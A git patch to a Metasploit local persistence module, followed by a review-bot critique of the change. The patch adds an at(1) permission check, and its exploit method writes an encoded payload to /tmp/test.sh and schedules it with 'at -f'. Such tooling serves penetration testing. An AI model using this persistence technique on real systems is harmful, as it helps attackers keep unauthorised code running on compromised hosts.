From 972db476ef8ee955e80ba116d94eeefaa5b99fa1 Mon Sep 17 00:00:00 2001
From: Jon Hart
Date: Tue, 13 Sep 2016 16:08:49 -0700
Subject: [PATCH] Implement check for at_persistence
---
 modules/exploits/multi/local/at_persistence.rb | 14 +++++++++++---
 1 file changed, 11 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/multi/local/at_persistence.rb b/modules/exploits/multi/local/at_persistence.rb
index 502c3c8083..dd41d43369 100644
--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -47,14 +47,22 @@ class MetasploitModule < Msf::Exploit::Local
 )
 end

- # TODO: find a better way to determine if the user can use at(1). cmd_exec doesn't get us stderr or a return code
 def check
- cmd_exec("ls -l")
+ token = "fail #{Rex::Text.rand_text_alphanumeric(8)}"
+ if cmd_exec("at -l || echo #{token}") =~ /#{token}/
+ Exploit::CheckCode::Safe
+ else
+ Exploit::CheckCode::Vulnerable
+ end
 end

 def exploit
+ unless check == Exploit::CheckCode::Vulnerable
+ fail_with(Failure::NoAccess, 'User denied cron via at.deny')
+ end
+
 write_file("/tmp/test.sh", payload.encoded)
- print_status(cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}"))
+ cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")
 print_status("Waiting #{datastore['WfsDelay']}sec for execution")
 Rex.sleep(datastore['WfsDelay'].to_i)
 end
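Review bot: The `fail_with` message in `exploit` names at.deny as the cause, but `check` only observes that `at -l` exited non-zero, which presumably also happens when at(1) is missing or fails for an unrelated reason. A message such as `fail_with(Failure::NoAccess, 'at -l failed: at(1) unavailable or user not permitted (at.allow/at.deny)')` would not mislead whoever reads the log. In `check`, `=~ /#{token}/` compiles a regexp from an interpolated string where `cmd_exec(...).to_s.include?(token)` states the intent directly. A short comment such as `# cmd_exec gives no exit status, so echo a random token when at -l fails` would keep the reasoning that the removed TODO carried. The result of `cmd_exec("at -f ...")` is now discarded, so a scheduling error goes unreported; passing it to `vprint_status` would keep it visible in the module output.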